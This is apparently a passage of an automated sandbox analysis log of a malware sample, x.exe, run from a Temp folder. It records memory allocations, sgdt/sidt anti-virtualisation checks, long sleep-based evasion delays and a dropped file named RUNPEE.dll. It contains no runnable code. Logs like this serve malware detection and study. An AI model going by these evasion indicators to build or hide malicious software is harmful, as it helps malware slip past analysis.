                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: E90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2C00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4C00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 63B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 73B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1260000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC25B0 sgdt fword ptr [eax]11_2_00EC25B0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_00EC25B0 sidt fword ptr [ebp+edx*2-19h]11_2_00EC25B0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3187Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3216Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 8537Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 1333Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 8124Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 8080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2172Thread sleep count: 8537 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2172Thread sleep count: 1333 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599343s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599124s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598250s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598140s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -598031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597922s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597703s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597156s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -597046s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596937s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596828s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596718s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596609s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596390s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596281s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -596062s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595953s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595843s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595734s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595625s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595515s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595406s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595187s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -595078s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -594968s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -594859s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -594749s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2536Thread sleep time: -594640s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595625Jump to behavior
